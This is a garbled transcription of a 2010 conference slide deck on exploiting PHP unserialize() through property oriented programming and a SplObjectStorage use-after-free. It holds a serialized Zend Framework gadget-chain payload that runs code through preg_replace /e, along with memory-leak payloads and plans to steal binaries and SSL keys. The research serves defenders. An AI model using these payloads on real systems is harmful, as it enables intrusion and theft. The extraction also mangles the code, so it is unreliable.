Transcription
http://www.sektioneins.deUtilizing Code Reuse/ROP in PHPApplication ExploitsStefan Esser stefan.esser@sektioneins.de BlackHat USA 2010Las Vegas, Nevada
Who am I?Stefan Esser from Cologne/Germany Information Security since 1998 PHP Core Developer since 2001 Suhosin / Hardened-PHP 2004 Month of PHP Bugs 2007 / Month of PHP Security 2010 Head of Research & Development at SektionEins GmbHStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 2
Part IIntroductionStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 3
Introduction (I)Code Reuse / Return Oriented Programming shellcode is not injected into the application instead the applictation‘s code flow is hijacked and redirected pieces of already available code are executed in an attacker defined order reordered bits of code do exactly what the attacker wantsStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 4
Introduction (II)Research into Code Reuse / Return Oriented Programming consumer architectures: x86, amd64, sparc, ppc, arm intermediate architectures: REIL special architectures: voting systems no research yet for web applicationsStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 5
Introduction (III)Classification Code Reuse Return Oriented Programming Return To Libc . ?Code ReuseROP?Return To LibcStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 6
Introduction (IV).Return OrientedProgramming / Return To Libc based on hijacking thecallstack0x401234560x100x401425520x40423742 allows returning intoarbitrary code gadgets useful code followed by areturn0x401234550x170xDEADBEEF0xDEADBEEF full control over the stack0x40441122.Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 pop ecxretmov eax, ecxretadd eax, ecxretpop edxpop ebxpop ecxretint 0x80ret7
Introduction (V)Return Oriented Programming is not possible at the PHP level callstack is spread over real stack heap data segment ROP would require control over multiple places at the same time normally overflows only allow to hijack one place at once PHP bytecode is at unknown positions in the heapStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 8
Introduction (VI)Code ReuseROP?Return To LibcStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 9
Introduction (VII)Code ReuseROPPropertyOrientedProgrammingReturn To Libc(POP)Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 10
Part IIProperty Oriented ProgrammingStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 11
Property Oriented ProgrammingProperty Oriented Programming when the callstack is notcontrollable another code reusetechnique is required new software is usually objectoriented objects call methods of otherobjects stored in their properties replacing or overwriting objects andproperties allows another form ofcode reuseStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 12
Property Oriented ProgrammingProperty Oriented Programming in PHP some limitations can only call start of methods cannot just overwrite some object in memory need a way to create objects and fill all their properties unserialize()Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 13
Part IIIPHP‘s unserialize()Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 14
unserialize() allows to deserialize serialized PHP variables supports most PHP variable types integers / floats / boolean strings / array / objects references often exposed to user input many vulnerabilities in the pastStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 15
unserialize() deserializing objects allows to control all properties public protected private but not the bytecode !!! however deserialized objects get woken up wakeup() and later destroyed via destruct() already existing code gets executedStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 16
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}arrayUnserialize keeps a table ofall created variables duringdeserialization in order tosupport referencesStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 17var table1
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array00Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 18
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array0012.0Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 193
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array340012.02“ABCD“Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 20
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array3400512.02“ABCD“32.0Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 21
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array34005my Class12.062“ABCD“32.04my ClassStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 22
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array34005my Classamy Class12.062“ABCD“732.04my ClassStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 23
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array34005my Classamy ClassbNULL12.062“ABCD“732.084my ClassStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 24
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array34005my Classamy ClassbNULL12.062“ABCD“732.084my Classmy Class- wakeup() is calledStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 25
:3;r:3;i:4;O:8:"my ectStorage":14:{x:i:0;m:a:0:{}}var table12array340051my Classamy ClassbNULL2.062“ABCD“732.084my Class95splObjectStoragesplObjectStorage.Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 26
Part IVUseable Vulnerabilities ClassesStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 27
When is an application vulnerable? An application is vulnerable if malicious input is passed to unserialize() Deserialization of user input is most obvious vulnerability cause but PHP applications use unserialize() in many different ways Other vulnerability classes can result in unserialize() vulnerabilitiesStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 28
Deserialization of User Input Applications use serialize() / unserialize() to transfer complex data Used in hidden HTML form fields and HTTP cookies Easy way to transfer arrays Developers are unaware of code execution Was quite harmless in PHP 4 days (aside from low level exploits)if (!isset( REQUEST['printpages']) && !isset( REQUEST['printstructures'])) {.} else { printpages unserialize(urldecode( REQUEST["printpages"])); printstructures unserialize(urldecode( REQUEST['printstructures']));}. form printpages urlencode(serialize( printpages)); smarty- assign by ref('form printpages', form printpages);Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 29
Deserialization of Cache Files Applications use serialize() /unserialize() to store variables incaching files These files are not supposed tobe changeable by the user Cache file directory usually verynear the directory for fileuploads File upload vulnerabilities canresult in caching files beingoverwritten File uploads outside ofdocument root can still result ininteresting attacks ?phpclass Zend Cache Core{public function load( id, doNotTestCacheValidity false{if (! this- options['caching']) {return false;} id this- id( id); // cache id may need prefix this- lastId id;self:: validateIdOrTag( id); data this- backend- load( id, doNotTestCacheValif ( data false) {// no cache availablereturn false;}if ((! doNotUnserialize) && this- options['automati// we need to unserialize before sending the resureturn unserialize( data);}return data;}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 30
Deserialization of Network Data Applications use serialize() / unserialize() for public web APIs Well known example: Wordpress when API is using plaintext HTTP protocol - vulnerable to MITM HTTP man-in-the-middle to perform attacks against unserialize() options array('timeout' ( ( defined('DOING CRON') && DOING CRON ) ? 30 : 3),'body' array( 'plugins' serialize( to send ) ),'user-agent' 'WordPress/' . wp version . '; ' . get bloginfo( 'url' )); raw response wp remote k/1.0/', options);if ( is wp error( raw response ) )return false;if ( 200 ! raw response['response']['code'] )return false; response unserialize( raw response['body'] );Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 31
Deserialization of Database Fields Applications / Frameworks use serialize() / unserialize() to store morecomplex data in database fields Therefore SQL injection vulnerabilities might allow attackers to controlwhat is deserialized Database APIs like PDO MySQL allow stacked SQL queriespublic function jsonGetFavoritesProjectsAction(){ setting Phprojekt Loader::getLibraryClass('Phprojekt Setting'); setting- setModule('Timecard'); favorites setting- getSetting('favorites');if (!empty( favorites)) { favorites unserialize( favorites);} else { favorites array();}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 32
Session Deserialization Weakness If attacker has control over start of session key name and the associatedvalue he can exploit a vulnerability in the session extension MOPS-2010-060 is a weakness that allows to inject arbitrary serializedvalues into the session by confusing the deserializer with a ! This allows to attack unserialize() through the session deserializer ?php// Start the sessionsession start();// Full Control SESSION array merge( SESSION , POST);// Just controlling one session entry prefix REQUEST[’prefix’]; SESSION[ prefix.’ foo’] REQUEST[ prefix];? Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 33
Part VExploitability RequirementsStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 34
When is an application exploitable?Application is exploitable if it is deserializing user input and contains classes useable in a POP chainA class is useable in a POP chain if it is available during unserialize() if it can start a POP chain if it can transfer execution in a POP chain if it contains interesting operationsStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 35
Class Availability POP attacks can only use classes available during unserialize() unserialize() can deserialize any valid classname - but unknown classeswill be incomplete and unusable for POP PHP only knows about classes defined in already included files some PHP applications register an autoload() function which oftenallows all application classes to be usedStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 36
POP Chain: Starting the Chain a class can be start of a POP chain if it has an interesting object methodthat is automatically executed by PHP Usually this is wakeup() destruct()but other magic methods are possible toString() call() set() get() ?phpclass popstarter{function destruct(){.}}? Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 37
POP Chain: Execution Flow Transfer a class can be interesting for a POP chain if it transfers execution to anobject inside its properties by invoking a method by invoking a toString()conversion the other object by invoking another magicmethod of the object ?phpclass exectransfer{function methodA(){ this- prop2- methodB(); this- prop3- data this- prop4;return 'data: ' . this- prop1;}}? Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 38
POP Chain: Interesting Operations The end of a POP chain requires a class method that contains aninteresting operation Interesting operations are file access database access session access mail access dynamic code evaluation dynamic code inclusion . ?phpclass operation{function methodB(){ message file get contents( this- tempfile);mail( this- to, this- subject, message);unlink( this- tempfile);}}? Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 39
Part VIExamplesStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 40
Zend Logclass Zend Log{./*** @var array of Zend Log Writer Abstract*/protected writers array();./*** Class destructor. Shutdown log writers** @return void*/public function destruct(){foreach( this- writers as writer) { writer- shutdown();}}Zend LogwritersStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 41
Zend Log Writer MailZend Log Writer Mailclass Zend Log Writer Mail extends Zend Log Writer Abstract{public function shutdown(){eventsToMailif (empty( this- eventsToMail)) {subjectPrependTextreturn;mail}if ( this- subjectPrependText ! null) {layout numEntries this- Mail this- mail- setSubject("{ this- subjectPrependText} ({ numEntries})");} this- mail- setBodyText(implode('', this- eventsToMail));// If a Zend Layout instance is being used, set its "events"// value to the lines formatted for use with the layout.if ( this- layout) {// Set the required "messages" value for the layout. Here we// are assuming that the layout is for use with HTML. this- layout- events implode('', this- layoutEventsToMail);// If an exception occurs during rendering, convert it to a notice// so we can avoid an exception thrown without a stack frame.try { this- mail- setBodyHtml( this- layout- render());} catch (Exception e) {trigger error(.Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 42
Zend Layout{class Zend Layout.protected inflector;protected inflectorEnabled true;protected layout 'layout';.public function render( name null){if (null name) { name this- getLayout();}Zend LayoutinflectorinflectorEnabledlayoutif ( this- inflectorEnabled() && (null ! ( inflector this- getInflector()))){ name this- inflector- filter(array('script' name));}}}.Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 43
Zend Filter PregReplaceclass Zend Filter PregReplace implements Zend Filter Interface{protected matchPattern null;protected replacement '';.public function filter( value){if ( this- matchPattern null) {require once 'Zend/Filter/Exception.php';throw new Zend Filter Exception(get class( this) . ' does .');}return preg replace( this- matchPattern, this- replacement, value);}}Zend Filter PregReplacematchPatternreplacementStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 44
Putting it all together.Zend LogZend Filter PregReplacematchPattern "/(.*)/e"replacement "phpinfo().die()"Zend LayoutinflectorinflectorEnabled truelayout "layout"Zend MailwritersZend Log Writer MaileventsToMail array(1)subjectPrependText nullmaillayoutlayoutEventsToMail array(1)O:8:\"Zend Log\":1:{s:11:\"\0*\0 writers\";a:1:{i:0;O:20:\"Zend Log Writer Mail\":5:{s:16:\"\0*\0 eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0 layoutEventsToMail\";a:0:{}s:8:\"\0*\0 mail\";O:9:\"Zend Mail\":0:{}s:10:\"\0*\0 layout\";O:11:\"Zend Layout\":3:{s:13:\"\0*\0 inflector\";O:23:\"Zend Filter PregReplace\":2:{s:16:\"\0*\0 matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0 \0 inflectorEnabled\";b:1;s:10:\"\0*\0 layout\";s:6:\"layout\";}s:22:\"\0*\0 subjectPrependText\";N;}}}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 45
Part VIIVulnerability in unserialize()Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 46
Vulnerability in unserialize() property oriented exploitation often not possible applications unserialize() user input but do not have interesting objects however unserialize() is a parser and parsers tend to be vulnerable indeed there is a use-after-free vulnerability in SplObjectStorageStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 47
SplObjectStorage provides an object set in PHP 5.2 ?php x new SplObjectStorage(); x- attach(new Alpha()); x- attach(new ha":0:{};O:4:"Beta":0:{};m:a:0:{}}? provides a map from objects to data in PHP 5.3 ?php x new SplObjectStorage(); x- attach(new Alpha(), 123); x- attach(new Beta(), :0:{},i:123;;O:4:"Beta":0:{},i:456;;m:a:0:{}}? Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 48
Object Set/Map Index key to the object set / map is derived from the object valuezend object value zvalue;memset(&zvalue, 0, sizeof(zend object value));zvalue.handle Z OBJ HANDLE P(obj);zvalue.handlers Z OBJ HT P(obj);zend hash update(&intern- storage, (char*)&zvalue, sizeof(zend object value), &element,sizeof(spl SplObjectStorageElement), NULL);typedef struct zend object value {zend object handle handle;zend object handlers *handlers;} zend object value;Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 49
Vulnerability in PHP 5.3.x references allow to attach the same object again in PHP 5.3.x this will destruct the previously stored extra data destruction of the extra data will not touch the internal var table references allow to still access/use the freed PHP variables use-after-free vulnerability allows to info leak or execute codeStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 50
Vulnerable Applications discussed vulnerability allows arbitrary code execution in any PHPapplication unserializing user input but in order to exploit it nicely the PHP applications shouldre-serialize and echo the result both is quite common in widespread PHP applications e.g. TikiWiki 4.2if (!isset( REQUEST['printpages']) && !isset( REQUEST['printstructures'])) {.} else { printpages unserialize(urldecode( REQUEST["printpages"])); printstructures unserialize(urldecode( REQUEST['printstructures']));}. form printpages urlencode(serialize( printpages)); smarty- assign by ref('form printpages', form printpages);Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 51
Part VIIISimple Information Leaks via unserialize()Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 52
DWORD Size? for the following steps it is required to know if target is 32 bit or 64 bit we can detect the bit size by sending integers larger than 32 bit- sending: i:11111111111;- answer: 64 bit PHP - i:11111111111; 32 bit PHP - i:-1773790777; 32 bit PHP - d:11111111111;Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 53
PHP 5.2.x vs. PHP 5.3.x as demonstrated the exploit is different for PHP 5.2.x and 5.3.x we can detect a difference in the ArrayObject implementation- sending: O:11:"ArrayObject":0:{}- answer: PHP 5.2.x - O:11:"ArrayObject":0:{} PHP 5.3.x - n Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 54
SplObjectStorage Version bugfix in the latest versions of PHP 5.2.x and PHP 5.3.x stored objects counter is no longer put in var table can be detected by references- sending: :2;i:2;i:3;r:4;}}- answer: PHP 5.2.12 - PHP i:1;i:2;i:2;i:3;i:2;}} PHP 5.2.13 - PHP i:1;i:2;i:2;i:3;i:1;}}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 55
Part IXLeak-After-Free AttacksStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 56
Endianess? for portability we need to detect the endianess remotely no simple info leak available we need a leak-after-free attack for thisStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 57
Creating a fake integer ZVALintegervaluereferencecounter we construct a string that represents an integer ZVAL32 bit integer ZVAL: 00 01 00 00 41 41 41 41 00 01 01 00 01 00 string is a valid integer no matter what endianess reference counter is choosen to be not zero or one (0x101) type is set to integer variable (0x01) value will be 0x100 for little endian and 0x10000 for big endian when sent to the server the returned value determines endianessStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 58
Endianess Unserialize Payloadorange numbers are notvalid because serializedstrings were modified toenhance visibilty create an array of integer variables free the array create a fake ZVAL string which will reuse the memory create a reference to one of the already freed integer variables reference will point to our fake 1\x00BBCCC";i:2;r:11;}}}}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 59
Endianess Payload Reply for little endian systems the reply will \01\x00BBCCC";i:2;i:256;}}} and for big endian systems it \01\x00BBCCC";i:2;i:65536;}}}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 60
Leak Arbitrary Memory? we want a really stable, portable, non-crashing exploit this requires more info leaks - it would be nice to leak arbitrary memory is that possible with a leak-after-free attack? Yes it is!Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 61
Creating a fake string ZVALstringpointerstringlengthreferencecounter we construct a string that represents a string ZVAL32 bit string ZVAL: 18 21 34 B7 00 04 00 00 00 01 01 00 06 00 our fake string ZVAL string pointer points where we want to leak (0xB7342118) length is set to 1024 (0x400) reference counter is choosen to be not zero or one (0x101) type is set to string variable (0x06) when sent to the server the returned value contains 1024 leaked bytesStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 62
Arbitrary Leak Unserialize Payload create an array of integer variables free the array create a fake ZVAL string which will reuse the memory create a reference to one of the already freed integer variables reference will point to our fake string \01\00\06\x00BBCCC";i:2;r:11;}}}}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 63
Arbitrary Leak Response the response will look a lot like \00\01\01\00\06\00BBCCC";i:2;s:1024:"?Y? ?R?0?R?P?R?Q?Q?@?Q?Q?Q?Q?P?Q? ?R?0?R?cR?p?R?R?R?R?0?R? R?@?R?R?p?R?gR?R?hR?gR?jR?0hR?R?kR? ?R?0?R?P?R?R?R?.!"# %&'()* ,-./0123456789:; ?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\] abcdefghijklmnopqrstuvwxyz{ } ?@?N22PAPQY?TY?d?9Y?]?s6\?BY? ?J?PBY?AY? 8Y? Y? ]P? @Y? Y?0 Y? Y? Y?;Y? 9Y?\?2?]?ve?TY?TY?UY?Y?e?e?e? ?e?e? ?e?e?";}}}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 64
Starting Point? wait a second. how do we know where to start when leaking memory can we leak some PHP addresses is that possible with a leak-after-free attack? Yes it is!Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 65
Creating a fake string ZVALstringpointerstringlengthreferencecounter we again construct a string that represents a string ZVAL32 bit string ZVAL: 41 41 41 41 00 04 00 00 00 01 01 00 06 00 our fake string ZVAL pointer points where anywhere - will be overwritten by a free (0x41414141) length is set to 1024 (0x400) reference counter is choosen to be not zero or one (0x101) type is set to string variable (0x06) when sent to the server the returned value contains 1024 leaked bytesStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 66
Starting Point Leak Unserialize Payload create an array of integervariables to allocate memory create another array of integervariables and free the array create an array which mixes ourfake ZVAL strings and objects free that array create a reference to one of thealready freed integer variables reference will point to our alreadyfreed fake string ZVAL string pointer of fake stringwas overwritten by memorycache \01\00\06\x00BBCCC";i:109;O:8:"stdclass":0:{}i:9; 7;}}}}Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 67
Starting Point Leak Response the response will contain the leaked 1024 bytes of memory starting from an already freed addressoverwrittenby freeobjecthandlersreferencecounter we search for freed object ZVALs in the reply32 bit object ZVAL: 41 41 41 41 20 12 34 B7 00 00 00 00 05 00 patternto search the object handlers address is a pointer into PHP‘s data segment we can leak memory at this address to get a list of pointers into the code segmentStefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 68
Where to go from here? having pointers into the code segmentand an arbitrary mem info leak we can . scan backward for the ELF / PE / . executable header remotely steal the PHP binary and all it‘s data lookup any symbol in PHP binary find other interesting webserver modules (and their executable headers) and steal their data (e.g. mod ssl private SSL key) use gathered data for a remote code execution exploitSte
Stefan Esser Utilizing Code Reuse/ROP in PHP Application Exploits July 2010 Who am I? Stefan Esser from Cologne/Germany Information Security since 1998 PHP Core Developer since 2001 Suhosin / Hardened-PHP 2004 Month of PHP Bugs 2007 / Month of PHP Security 2010 Head of Research & Development at SektionEins GmbH 2
